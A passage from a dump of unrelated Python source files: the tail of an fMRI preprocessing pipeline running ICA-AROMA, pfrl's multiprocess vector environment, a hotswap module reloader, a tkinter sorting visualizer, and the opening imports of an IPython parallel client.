t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat' + '/' + 'filtered_func_data.nii.gz') and not entry.overwrite:
print("AROMA model complete...skipping: " + imgname)
continue
print(" ")
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
fsf_template = entry.templates + "/models/aroma_noHP.fsf"
stdimg = os.popen('echo $FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz').read().rstrip()
s=', '
print('Running AROMA Model: ' + imgpath)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_aroma_model.sh " + imgpath + " " + t1wpath + " " + fsf_template + " " + stdimg + " " + entry.wd
name = "aroma-model-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all aroma model commands to finish
return returnflag
## end run_aroma_icamodel
def run_aroma_classify(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, space='T1w', desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
if os.path.exists(entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run']) + '/' + 'denoised_func_data_nonaggr.nii.gz') and not entry.overwrite:
print("AROMA classification complete...skipping: " + ent['task'] + str(ent['run']) )
continue
print(" ")
# check necessary input exists
if not os.path.exists(entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat' + '/' + 'filtered_func_data.nii.gz'):
raise Exception("Cannot identify aroma feat model intended for aroma classification:" +ent['task'] + str(ent['run']) )
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
print('Running classification Model: ' + ent['task'] + str(ent['run']) )
# -------- run command -------- #
featdir=entry.wd + '/aroma/' + ent['task'] + str(ent['run']) +'_aroma_noHP.feat'
outdir=entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run'])
cmd = "bash " + entry.templates + "/run_aroma_classify.sh " + featdir + " " + outdir
name = "aroma-classify-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
def save_aroma_outputs(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'native'
ent['desc'] = 'smoothAROMAnonaggr'
ent['suffix'] = 'bold'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("AROMA image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
infile = entry.wd + '/aroma/aroma_classify/' + ent['task'] + str(ent['run']) + '/' + 'denoised_func_data_nonaggr.nii.gz'
os.system('cp -p ' + infile + ' ' + entry.outputs + '/' + outfile)
def generate_confounds_file(path,task):
import os
import sys
import pandas as pd
# after running fsl outliers - put all coundounds into one file
df=pd.DataFrame()
files = ["dvars_metrics", "fd_metrics" ]
for f in files:
d=pd.read_csv(path + "/" + task + "_" + f + ".tsv",sep="\s+")
colnames = f.strip("metrics").strip("_")
d.columns = [colnames]
df = pd.concat([df,d],axis=1)
files = ["dvars_outliers", "fd_outliers" ]
for f in files:
if os.path.exists(path+"/"+ task + "_" + f + ".tsv"):
d=pd.read_csv(path+"/"+ task + "_" + f + ".tsv",sep="\s+")
mylist=list(range(0,d.shape[1]))
colnames = [f + "_" + str(s) for s in mylist]
d.columns = colnames
df = pd.concat([df,d],axis=1)
# output a single confounds file
df.to_csv(path +"/"+ task + "_confounds.tsv",sep="\t")
# END GENERATE_CONFOUNDS_FILE
# def run_aroma_preprocess(layout,entry):
# # run second motion correction - seems uncessesary??
def generate_report():
# generates a summary report of the preprocessing pipeline.
# 1. registration quality (fsl images)
# 2. outlier detection (plot)
# 3. carpet plot for each func? - before / after aroma?
# 4. description of methods
return True
# generate snr tests...
# /projects/ics/software/fsl/6.0.3/bin/slicer highres2standard standard -s 2 -x 0.35 sla.png -x 0.45 slb.png -x 0.55 slc.png -x 0.65 sld.png -y 0.35 sle.png -y 0.45 slf.png -y 0.55 slg.png -y 0.65 slh.png -z 0.35 sli.png -z 0.45 slj.png -z 0.55 slk.png -z 0.65 sll.png ; /projects/ics/software/fsl/6.0.3/bin/pngappend sla.png + slb.png + slc.png + sld.png + sle.png + slf.png + slg.png + slh.png + sli.png + slj.png + slk.png + sll.png highres2standard1.png
# /projects/ics/software/fsl/6.0.3/bin/fsl_tsplot -i prefiltered_func_data_mcf.par -t 'MCFLIRT estimated translations (mm)' -u 1 --start=4 --finish=6 -a x,y,z -w 640 -h 144 -o trans.png
def run_cleanup(entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
#concatenate and move logs to final dir...
# remove working directory if requested...
if entry.cleandir == True:
os.system('rm -Rf ' + entry.wd)
## end run_cleanup
def main(argv):
import glob
import re
import os
import sys
import warnings
# get user entry
entry = parse_arguments(argv)
os.makedirs(entry.wd, mode=511, exist_ok=True)
logdir = entry.wd + '/logs'
os.makedirs(logdir, mode=511, exist_ok=True)
# get participant bids path:
bids = bids_data(entry)
# pipeline: (1) BET, (2) topup, (3) distortion correction, (4) mcflirt
# bet
if run_bet(bids,entry):
save_bet(bids,entry)
# distortion correction
run_topup(bids,entry)
run_distcorrepi(bids,entry)
# motion correction + trim
if run_preprocess(bids,entry):
save_preprocess(bids,entry)
# add derivatives to bids object
bids.add_derivatives(entry.outputs + '/fmripreproc/')
# registration
if run_registration(bids,entry):
save_registration(bids,entry)
# snr
if run_snr(bids,entry):
save_snr(bids,entry)
# generate confounds
run_outliers(bids,entry)
save_outliers(bids,entry)
# fast
if run_fast(bids,entry):
save_fast(bids,entry)
# aroma
if run_aroma_icamodel(bids,entry) or run_aroma_classify(bids,entry):
save_aroma_outputs(bids,entry)
save_bet(bids,entry)
save_preprocess(bids,entry)
save_registration(bids,entry)
save_snr(bids,entry)
save_fast(bids,entry)
save_aroma_outputs(bids,entry)
# clean-up
# run_cleanup(entry)
__version__ = "0.0.2" # version is needed for packaging
if __name__ == "__main__":
import sys
main(sys.argv[1:])
|
multiprocess_vector_env.py
|
import signal
import warnings
from multiprocessing import Pipe, Process
import numpy as np
from torch.distributions.utils import lazy_property
import pfrl
def worker(remote, env_fn):
# Ignore CTRL+C in the worker process
signal.signal(signal.SIGINT, signal.SIG_IGN)
env = env_fn()
try:
while True:
cmd, data = remote.recv()
if cmd == "step":
ob, reward, done, info = env.step(data)
remote.send((ob, reward, done, info))
elif cmd == "reset":
ob = env.reset()
remote.send(ob)
elif cmd == "close":
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.action_space, env.observation_space))
elif cmd == "spec":
remote.send(env.spec)
elif cmd == "seed":
remote.send(env.seed(data))
else:
raise NotImplementedError
finally:
env.close()
class MultiprocessVectorEnv(pfrl.env.VectorEnv):
"""VectorEnv where each env is run in its own subprocess.
Args:
env_fns (list of callable): List of callables, each of which
returns gym.Env that is run in its own subprocess.
"""
def __init__(self, env_fns):
if np.__version__ == "1.16.0":
warnings.warn(
"""
NumPy 1.16.0 can cause severe memory leak in pfrl.envs.MultiprocessVectorEnv.
We recommend using other versions of NumPy.
See https://github.com/numpy/numpy/issues/12793 for details.
"""
) # NOQA
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(target=worker, args=(work_remote, env_fn))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)
]
for p in self.ps:
p.start()
self.last_obs = [None] * self.num_envs
self.remotes[0].send(("get_spaces", None))
self.action_space, self.observation_space = self.remotes[0].recv()
self.closed = False
def __del__(self):
if not self.closed:
self.close()
@lazy_property
def spec(self):
self._assert_not_closed()
self.remotes[0].send(("spec", None))
spec = self.remotes[0].recv()
return spec
def step(self, actions):
self._assert_not_closed()
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
results = [remote.recv() for remote in self.remotes]
self.last_obs, rews, dones, infos = zip(*results)
return self.last_obs, rews, dones, infos
def reset(self, mask=None):
self._assert_not_closed()
if mask is None:
mask = np.zeros(self.num_envs)
for m, remote in zip(mask, self.remotes):
if not m:
remote.send(("reset", None))
obs = [
remote.recv() if not m else o
for m, remote, o in zip(mask, self.remotes, self.last_obs)
]
self.last_obs = obs
return obs
def close(self):
self._assert_not_closed()
self.closed = True
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
def seed(self, seeds=None):
self._assert_not_closed()
if seeds is not None:
if isinstance(seeds, int):
seeds = [seeds] * self.num_envs
elif isinstance(seeds, list):
if len(seeds) != self.num_envs:
raise ValueError(
"length of seeds must be same as num_envs {}".format(
self.num_envs
)
)
else:
raise TypeError(
"Type of Seeds {} is not supported.".format(type(seeds))
)
else:
seeds = [None] * self.num_envs
for remote, seed in zip(self.remotes, seeds):
remote.send(("seed", seed))
results = [remote.recv() for remote in self.remotes]
return results
@property
def num_envs(self):
return len(self.remotes)
def _assert_not_closed(self):
assert not self.closed, "This env is already closed"
|
hotswap.py
|
#!/usr/bin/env python
"""Automatic replacement of imported Python modules.
The hotswap module watches the source files of imported modules which are
replaced by its new version when the respective source files change.
The need for a program restart during development of long-running programs
like GUI applications for example is reduced.
Additionally this module can be called as a wrapper script:
hotswap.py [OPTIONS] <module.py> [args]
In this case module.py is imported as module and the function
module.main() is called. Hotswapping is enabled so that changes
in the source code take effect without restarting the program.
"""
version = "0.3.1"
__author__ = "Michael Krause"
__email__ = "michael@krause-software.com"
#
# CREDITS
# The idea and first implementation of the mechanism used by this module
# was first made public by Thomas Heller in a Usenet posting
# to comp.lang.python in 2001 (named autoreload.py).
# Updates for new-style classes were taken from a Usenet posting
# by Jeremy Fincher.
__all__ = ['run', 'stop', 'superreload']
import time
import os
import threading
import sys
import types
import imp
import getopt
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
try:
reload
except NameError:
from importlib import reload
if PY2:
TypeType = types.TypeType
ClassType = types.ClassType
else:
TypeType = type
ClassType = type
def _get_compiled_ext():
for ext, mode, typ in imp.get_suffixes():
if typ == imp.PY_COMPILED:
return ext
# the official way to get the extension of compiled files (.pyc or .pyo)
PY_COMPILED_EXT = _get_compiled_ext()
class ModuleWatcher:
SECONDS_BETWEEN_CHECKS = 0.1
SKIP_SYSTEM_MODULES = False
NOTIFYFUNC = None
VERBOSE = False
running = 0
def __init__(self):
# If we don't do this, there may be tracebacks
# when shutting down python.
import atexit
atexit.register(self.stop)
def run(self, skipsystem=SKIP_SYSTEM_MODULES,
seconds=SECONDS_BETWEEN_CHECKS,
notifyfunc=NOTIFYFUNC,
verbose=VERBOSE):
if self.running:
if verbose:
print("# hotswap already running")
return
self.SKIP_SYSTEM_MODULES = skipsystem
self.SECONDS_BETWEEN_CHECKS = seconds
self.NOTIFYFUNC = notifyfunc
self.VERBOSE = verbose
if self.VERBOSE:
print("# starting hotswap seconds=%s, skipsystem=%s" \
% (self.SECONDS_BETWEEN_CHECKS, self.SKIP_SYSTEM_MODULES))
self.running = 1
self.thread = threading.Thread(target=self._check_modules)
self.thread.setDaemon(1)
self.thread.start()
def stop(self):
if not self.running:
if self.VERBOSE:
print("# hotswap not running")
return
self.running = 0
self.thread.join()
if self.VERBOSE:
print("# hotswap stopped")
def _check_modules(self):
last_modified = {}
while self.running:
time.sleep(self.SECONDS_BETWEEN_CHECKS)
for m in list(sys.modules.values()):
if not hasattr(m, '__file__'):
# We only check modules that have a plain file
# as Python source.
continue
if m.__name__ == '__main__':
# __main__ cannot be reloaded without executing
# its code a second time, so we skip it.
continue
file = m.__file__
path, ext = os.path.splitext(file)
if self.SKIP_SYSTEM_MODULES:
# do not check system modules
sysprefix = sys.prefix + os.sep
if file.startswith(sysprefix):
continue
if ext.lower() == '.py':
ext = PY_COMPILED_EXT
if ext != PY_COMPILED_EXT:
continue
sourcefile = path + '.py'
try:
source_mtime = os.stat(sourcefile)[8]
if sourcefile not in last_modified:
last_modified[sourcefile] = source_mtime
continue
else:
if source_mtime <= last_modified[sourcefile]:
continue
last_modified[sourcefile] = source_mtime
except OSError:
continue
try:
superreload(m, verbose=self.VERBOSE)
except:
import traceback
traceback.print_exc(0)
try:
if hasattr(m, 'onHotswap') and callable(m.onHotswap):
# The module can invalidate cached results or post
# redisplay operations by defining function named
# onHotswap that is called after a reload.
m.onHotswap()
if callable(self.NOTIFYFUNC):
self.NOTIFYFUNC(module=m)
except:
import traceback
traceback.print_exc(0)
def update_function(old, new, attrnames):
for name in attrnames:
try:
setattr(old, name, getattr(new, name))
except AttributeError:
pass
def superreload(module,
reload=reload,
_old_objects = {},
verbose=True):
"""superreload (module) -> module
Enhanced version of the builtin reload function.
superreload replaces the class dictionary of every top-level
class in the module with the new one automatically,
as well as every function's code object.
"""
# retrieve the attributes from the module before the reload,
# and remember them in _old_objects.
for name, object in module.__dict__.items():
key = (module.__name__, name)
_old_objects.setdefault(key, []).append(object)
if verbose:
print("# reloading module %r" % module)
newmodule = reload(module)
if newmodule is None:
return module
# XXX We have a problem here if importing the module fails!
# iterate over all objects and update them
for name, new_obj in newmodule.__dict__.items():
# print "updating", `name`, type(new_obj), `new_obj`
key = (newmodule.__name__, name)
if key in _old_objects:
for old_obj in _old_objects[key]:
if type(new_obj) == ClassType:
if hasattr(old_obj.__dict__, 'update'):
old_obj.__dict__.update(new_obj.__dict__)
elif type(new_obj) == types.FunctionType:
update_function(old_obj,
new_obj,
"func_code func_defaults func_doc".split())
elif type(new_obj) == types.MethodType:
update_function(old_obj.im_func,
new_obj.im_func,
"func_code func_defaults func_doc".split())
return newmodule
_watcher = ModuleWatcher()
run = _watcher.run
stop = _watcher.stop
def modulename(path):
return os.path.splitext(path)[0].replace(os.sep, '.')
def importmodule(filename):
"""Returns the imported module of this source file.
This function tries to find this source file as module
on the Python path, so that its typical module name is used.
If this does not work, the directory of this file is inserted
at the beginning of sys.path and the import is attempted again.
"""
sourcefile = os.path.abspath(filename)
modfile = os.path.basename(sourcefile)
# Given an absolute filename of a python source file,
# we need to find it on the Python path to calculate its
# proper module name.
candidates = []
for p in sys.path:
pdir = p + os.sep
checkfile = os.path.join(p, modfile)
if os.path.normcase(sourcefile).startswith(os.path.normcase(pdir)):
relmodfile = sourcefile[len(pdir):]
candidates.append((len(relmodfile), relmodfile))
if candidates:
# Pick the most specific module path from all candidates
candidates.sort()
modname = modulename(candidates[0][1])
else:
modname = modulename(os.path.basename(sourcefile))
try:
# In case the source file was in the Python path
# it can be imported now.
module = __import__(modname, globals(), locals(), [])
except ImportError as e:
failed_modname = str(e).split()[-1]
failed_modname = failed_modname.replace("'", "")
if failed_modname == modname:
# The ImportError wasn't caused by some nested import
# but our module was not found, so we add the source files
# directory to the path and import it again.
modname = modulename(os.path.basename(sourcefile))
sys.path.insert(0, os.path.dirname(sourcefile))
module = __import__(modname, globals(), locals(), [])
else:
import traceback
tb = sys.exc_traceback
if tb:
tb = tb.tb_next
traceback.print_exception(sys.exc_type, sys.exc_value, tb)
# The module to be imported could be found but raised an
# ImportError itself.
raise e
# We have to deal module nesting like logging.handlers
# before calling the modules main function.
components = modname.split('.')
for comp in components[1:]:
module = getattr(module, comp)
return module
#----------------------------------------------------------------------------
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def usage(argv0):
print >>sys.stderr, """Usage: %s [OPTIONS] <module.py>
Import module and call module.main() with hotswap enabled.
Subsequent modifications in module.py and other source files of
modules being used are monitored periodically and put into effect
without restarting the program.
Options:
-h, --help Display this help then exit.
-w, --wait Wait number of seconds between checks. [0.1]
-s, --skipsystem Skip check of system modules beneath (%s). [False]
-v, --verbose Display diagnostic messages. [False]
""" % (argv0, sys.prefix)
#----------------------------------------------------------------------------
def main(argv=None):
if argv is None:
argv = sys.argv
wait = ModuleWatcher.SECONDS_BETWEEN_CHECKS
skipsystem = ModuleWatcher.SKIP_SYSTEM_MODULES
verbose = ModuleWatcher.VERBOSE
# parse command line arguments
try:
try:
opts, args = getopt.getopt(argv[1:], "hw:sv",
["help", "wait",
"skipsystem", "verbose"])
except getopt.error as msg:
raise Usage(msg)
for o, a in opts:
if o in ("-h", "--help"):
usage(argv[0])
return 0
if o in ("-w", "--wait"):
try:
wait = float(a)
except ValueError:
raise Usage("Parameter -w/--wait expects a float value")
if o in ("-s", "--skipsystem"):
skipsystem = True
if o in ("-v", "--verbose"):
verbose = True
except Usage as err:
print >>sys.stderr, "%s:" % argv[0],
print >>sys.stderr, err.msg
print >>sys.stderr, "for help use --help"
return 2
# Remove hotswap options from arguments
if args:
del argv[1:-len(args)]
else:
del argv[1:]
if len(argv) <= 1:
usage(argv[0])
sys.exit(1)
firstarg = argv[1]
sourcefile = os.path.abspath(firstarg)
if not os.path.isfile(sourcefile):
print("%s: File '%s' does not exist." % (os.path.basename(argv[0]),
sourcefile))
sys.exit(1)
try:
module = importmodule(sourcefile)
except ImportError as e:
print("%s: Unable to import '%s' as module: %s" % (os.path.basename(argv[0]),
sourcefile, e))
sys.exit(1)
# Remove hotswap.py from arguments that argv looks as
# if no additional wrapper was present.
del argv[0]
# Start hotswapping
run(skipsystem=skipsystem,
seconds=wait,
verbose=verbose)
# Run the Python source file with hotswapping enabled.
module.main()
if __name__ == '__main__':
main()
|
Start_Sorting.py
|
from tkinter import *
from tkinter import messagebox
from random import shuffle, sample
from Codes.Sorting_Algorithms import algochooser
from colorsys import hls_to_rgb
from threading import *
from tkinter import *
import Codes.Start_Threading
# Main sorting class
class Sorting:
def __init__(self, root, AlgoNameVar):
# Sorting window
self.root = root
# warning for close/exit
self.root.protocol("WM_DELETE_WINDOW", self.Close)
# Selected Algorithm Name
self.AlgoNameVar = AlgoNameVar
# Window Size
self.wx, self.wy = 1200, 700
# Screen Size
self.wxs, self.wys = self.root.winfo_screenwidth(), self.root.winfo_screenheight()
# Aligning the window in the center of the screen
self.WINDOW_X, self.WINDOW_Y = (self.wxs / 2) - (self.wx / 2), (self.wys / 2) - (self.wy / 2)
# Sorting canvas size
self.CANVAS_X, self.CANVAS_Y = 950, 700
# Left side information frame size
self.FRAME1_X, self.FRAME1_Y = 250, 700
# Apply changes to window
self.root.geometry('%dx%d+%d+%d' % (self.wx, self.wy, self.WINDOW_X, self.WINDOW_Y))
self.root.config(bg="grey")
self.root.wm_resizable(False, False)
# Title And Icon
self.root.title("Sorting Algorithm Visualizer")
try:
self.root.iconbitmap("Images/sorting.ico")
except:
img = PhotoImage("Images/sorting.ico")
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Starting size of the array
self.size_var = IntVar()
self.size_var.set(30)
# Starting speed of the array
self.speed_var = IntVar()
self.speed_var.set(20)
# Graph type bar or color
# 0 means bar 1 means color
self.graph_type = IntVar()
self.graph_type.set(0)
self.TYPE = self.graph_type.get()
# Starting point of the graph
self.starting_point = 2
# Creating frame in the left side
self.frame1 = Frame(root, width=self.FRAME1_X, height=self.FRAME1_Y, bg="light salmon")
self.frame1.grid_propagate(0)
self.frame1.pack(side=LEFT)
# Algorithm Information Table
self.information = {'Bubble Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n)",
'Selection Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n²)",
'Merge Sort': "Worst Case:O(n*log n)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Heap Sort': "Worst Case:O(n*log n)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Insertion Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n)",
'Quick Sort': "Worst Case:O(n²)\nAverage Case:O(n*log n)\nBest Case:O(n*log n)",
'Shell Sort': "Worst Case:O(n²)\nAverage Case:O(n²)\nBest Case:O(n*log n)",
'Radix Sort': "Worst Case:O(k*(n+b))\nAverage Case:O(k*(n+b))\nBest Case:O(k*(n+b))"}
# Algorithm Names
self.algorithm = ['Selection Sort', 'Insertion Sort', 'Bubble Sort', 'Merge Sort', 'Quick Sort', 'Heap Sort',
'Shell Sort', 'Radix Sort']
# Creating a drop down menu for algorithm selection
self.algo_var = StringVar()
# Setting it default value to what we selected previously in the main window
self.algo_var.set(self.AlgoNameVar)
self.algo_menu = OptionMenu(self.frame1, self.algo_var, *self.algorithm, command=self.case_chooser)
self.algo_menu.config(font="calibri", bg="pink", activebackground="sandy brown", cursor="circle")
self.algo_menu["highlightthickness"] = 0
self.algo_menu["padx"] = 20
self.algo_menu["pady"] = 8
self.algo_menu.grid_propagate(0)
# Place for the dropdown menu
self.algo_menu.place(rely=0.1, relx=0.5, anchor=CENTER)
# Creating a frame for new buttons
self.frame_btn1 = Frame(self.frame1, width=230, height=40, bg="light salmon")
self.frame_btn1.grid_propagate(0)
self.frame_btn1.place(relx=0.0, rely=0.17)
# Button for generating new array
self.btn_new = Button(self.frame_btn1, text="Generate", padx=13, pady=3, command=self.new_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_new.place(relx=0.15, rely=0)
# Button for shuffling the array
self.btn_shuffle = Button(self.frame_btn1, text="Shuffle", padx=13, pady=3, command=self.shuffle_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_shuffle.place(relx=0.60, rely=0)
# Option for bar / color graph
# Creating new frame for it
self.frame_radio = Frame(self.frame1, bg="light salmon", width=230, height=25, relief="flat", bd=4)
self.frame_radio.place(relx=0, rely=0.23)
self.frame_radio.grid_propagate(0)
# Creating the button / option
self.bar_drawing = Radiobutton(self.frame_radio, text="Bar", bg="light salmon", fg="navy", variable=self.graph_type, value=0,
font=("Helvetica", 10, "bold"), command=self.draw_type, cursor="hand2")
self.color_drawing = Radiobutton(self.frame_radio, text="Color", bg="light salmon", fg="navy", variable=self.graph_type,
value=1, font=("Helvetica", 10, "bold"), command=self.draw_type, cursor="hand2")
self.bar_drawing["activebackground"] = "#83A177"
self.color_drawing["activebackground"] = "#83A177"
self.bar_drawing.place(relx=0.25, rely=0)
self.color_drawing.place(relx=0.5, rely=0)
# Creating a frame for a new button
self.frame_btn2 = Frame(self.frame1, width=230, height=40, bg="light salmon")
self.frame_btn2.grid_propagate(0)
self.frame_btn2.place(relx=0.0, rely=0.3)
# Creating a sort button
self.btn_sort = Button(self.frame_btn2, text="Sort", padx=13, pady=3, command=self.sort_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_sort.place(relx=0.39, rely=0)
# Slider for changing size of array
self.scale_size = Scale(self.frame1, label="Size :", orient=HORIZONTAL, from_=10, to=200, length=230,
bg="pale goldenrod", troughcolor="#024e76", variable=self.size_var, command=self.change_size,
relief="solid", cursor="hand2")
self.scale_size.place(relx=0.04, rely=0.4)
self.scale_size["highlightthickness"] = 0
# Slider for changing speed of the operations
self.scale_speed = Scale(self.frame1, label="Speed :", orient=HORIZONTAL, from_=1, to=500, length=230,
bg="pale goldenrod", troughcolor="#024e76", variable=self.speed_var, command=self.change_speed, relief="solid", cursor="hand2")
self.scale_speed.place(relx=0.04, rely=0.5)
self.scale_speed["highlightthickness"] = 0
# Label for showing the number of comparisons
self.label_comparison = Label(self.frame1, text=" No. of comparisons: 0", bg="light salmon", fg="midnight blue", font=("Fixedsys", 12))
self.label_comparison.place(relx=0.1, rely=0.65)
# Frame for algorithm info
self.frame_algo_info = Frame(self.frame1, bg="tomato", width=230, height=150, relief="sunken", bd=4)
self.frame_algo_info.grid_propagate(0)
self.frame_algo_info.place(relx=0.03, rely=0.7)
# Label for algorithm info
self.label_avg = Label(self.frame_algo_info, bg="tomato", fg="midnight blue", text=self.information[self.algo_var.get()], font=("comic sans ms", 13, "bold"))
self.label_avg.pack_propagate(0)
self.label_avg.place(relx=0.06, rely=0.25)
# Back button to the main window
self.BackButton = Button(self.frame1, bg="burlywood1", fg="RoyalBlue4", text="< Go Back to main menu", command=self.Back, cursor="hand2")
self.BackButton.grid_propagate(0)
self.BackButton.place(relx=0.2, rely=0.94)
# Canvas for the graph
self.frame2 = Frame(self.root, width=self.CANVAS_X, height=self.CANVAS_Y)
self.frame2.pack(side=LEFT)
self.canva = Canvas(self.frame2, width=self.CANVAS_X, height=self.CANVAS_Y, bg="light goldenrod")
self.canva.pack()
# creating the new array
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
shuffle(list(set(self.numbers)))
self.rec_width = self.CANVAS_X // self.size_var.get()
for num in self.numbers:
self.canva.create_rectangle(self.starting_point, self.CANVAS_Y - num, self.starting_point + self.rec_width, self.CANVAS_Y, fill="sandy brown")
self.starting_point += self.rec_width
# Function for back button to main window
def Back(self):
self.root.destroy()
Process = Codes.Start_Threading.START()
Process.start()
# Function for exit
def Close(self):
if messagebox.askokcancel("Exit", "Do you want to exit?"):
self.root.destroy()
quit()
# function for painting the graph
def paint(self, colortype):
# delete the previous graph
self.canva.delete("all")
# start painting from here
self.starting_point = 2
# width of each bar
self.rec_width = self.CANVAS_X / self.size_var.get()
# if bar graph is selected
if self.TYPE == 0:
# paint the array
for i in range(len(self.numbers)):
self.canva.create_rectangle(
self.starting_point, self.CANVAS_Y - self.numbers[i], self.starting_point + self.rec_width, self.CANVAS_Y, fill=colortype[i])
self.starting_point += self.rec_width
# if color graph is selected
else:
# paint the array
for i in range(len(self.numbers)):
hls_color = hls_to_rgb(colortype[i] / 360, 0.6, 1)
red = hls_color[0] * 255
green = hls_color[1] * 255
blue = hls_color[2] * 255
self.canva.create_rectangle(self.starting_point, 0, self.starting_point + self.rec_width, self.CANVAS_Y,
outline="", fill="#%02x%02x%02x" % (int(red), int(green), int(blue)))
self.starting_point += self.rec_width
# update the graph frame
self.frame2.update()
# function for creating new list
def new_list(self):
numbers = []
self.label_comparison.configure(text="No. of comparisons: 0")
# enter random numbers into the new array
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
# shuffle the numbers
shuffle(list(set(numbers)))
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for shuffling the array
def shuffle_list(self):
shuffle(self.numbers)
self.label_comparison.configure(text="No. of comparison: 0")
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for changing the size of the array
def change_size(self, event):
self.label_comparison.configure(text="No. of comparisons: 0")
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
shuffle(list(set(self.numbers)))
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for changing the speed of the array
def change_speed(self, event):
pass
# function for sorting the list
def sort_list(self):
self.label_comparison.configure(text="No. of comparisons: 0")
startsort = Thread(target=algochooser(self.numbers, self.paint, self.label_comparison, self.algo_var.get(), self.TYPE, self.speed_var.get()))
startsort.start()
# function for choosing the sorting algorithm
def case_chooser(self, event):
self.label_avg.pack_forget()
self.label_avg.configure(text=self.information[self.algo_var.get()])
# function for drawing the default random bars/colors
def draw_type(self):
self.TYPE = self.graph_type.get()
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
self.paint(colortype)
|
client.py
|
"""A semi-synchronous Client for the ZMQ cluster
Authors:
* MinRK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import json
import sys
from threading import Thread, Event
import time
import warnings
from datetime import datetime
from getpass import getpass
from pprint import pprint
import collections
pjoin = os.path.join
import zmq
# from zmq.eventloop import ioloop, zmqstream
from IPython.config.configurable import MultipleInstanceError
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir, ProfileDirError
from IPython.utils.coloransi import TermColors
from IPython.utils.jsonutil import rekey
from IPython.utils.localinterfaces import LOCALHOST, LOCAL_IPS
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import cast_bytes
from IPython.utils.traitlets import (HasTraits, Integer, Instance, Unicode,
Dict, List, Bool, Set, Any)
from IPython.external.decorator import decorator
from IPython.external.ssh import tunnel
from IPython.parallel import Reference
from IPython.parallel import error
from IPython.parallel import util
from IPython.kernel.zmq.session import Session, Message
from IPython.kernel.zmq import serialize
from .asyncresult import AsyncResult, AsyncHubResult
from .view import DirectView, LoadBalancedView
if sys.version_info[0] >= 3:
